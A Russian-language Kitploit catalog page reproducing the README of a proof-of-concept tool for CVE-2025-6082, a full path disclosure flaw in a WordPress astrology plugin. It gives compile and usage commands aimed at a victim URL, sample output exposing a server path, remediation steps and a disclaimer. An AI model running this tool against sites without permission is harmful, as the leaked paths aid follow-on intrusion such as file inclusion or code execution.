Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6082 — Proof‑of‑Concept эксплойт, эксплуатирующий уязвимость раскрытия полного пути в плагине “Birth Chart Compatibility” WordPress (<=v2.0) | Kitploit
Инструменты/GitHubGitHub/bytereaper77/cve-2025-6082
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеArchived
GitHubbytereaper77/cve-2025-6082

CVE-2025-6082

Proof‑of‑Concept эксплойт, эксплуатирующий уязвимость раскрытия полного пути в плагине “Birth Chart Compatibility” WordPress (<=v2.0)

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-6082 PoC раскрытия полного пути

Автор: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Уязвимость: Раскрытие полного пути (CWE-200)

Описание

Данный Proof‑of‑Concept эксплуатирует ошибку раскрытия полного пути в плагине Birth Chart Compatibility для WordPress (версии ≤ 2.0). POC отправляет HTTP GET‑запрос к конечной точке index.php плагина, перехватывает любые PHP‑предупреждения или фатальные ошибки и извлекает путь в файловой системе сервера (например, /var/www/html/wp-content/plugins/... или C:\xampp\htdocs\...).
Раскрытие полного пути помогает злоумышленнику в проведении дальнейших атак, таких как локальное включение файлов (LFI), удалённое выполнение кода (RCE) или других разведывательных действий.

Требования

  • Linux
  • gcc или совместимый компилятор C
  • Заголовочные файлы разработки libcurl
  • argparse.c / argparse.h

Компиляция

root@kitploit:~
gcc -o fpd-poc exploit.c argparse.c  -lcurl

Использование

./fpd-poc -u https://target.com [опции]

Опции:

Флаг Описание

-u, --url (Обязательно) Базовый URL целевого сайта WordPress

-c, --cookies Использовать cookies из файла (опционально)

-v, --verbose Включить подробный вывод curl

-f, --loop Повторить запрос N раз (например, -f 10)

-h, --help Показать это справочное сообщение

Пример:

Одиночная проверка

./fpd-poc -u https://victim.com

Подробный режим с 5 повторениями

./fpd-poc -u https://victim.com -v -f 5 Пример вывода:

root@kitploit:~
[+] Request sent successfully

[+] Input Url      : https://victim.com

[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Http Code      : 200

====================================[Response]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Response Len   : 256

[+] Keyword found: Warning:

[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

Устранение

Обновите плагин «Birth Chart Compatibility» до исправленной версии (> 2.0) сразу после её выхода.

Отключите или удалите плагин, если вы его не используете.

Запретите прямой доступ к файлам PHP плагина (index.php) через настройки вашего веб‑сервера (например, с помощью правил .htaccess или Nginx).

Отказ от ответственности Данный код предоставляется только для образовательных целей и тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, может быть незаконным.

Скачать инструмент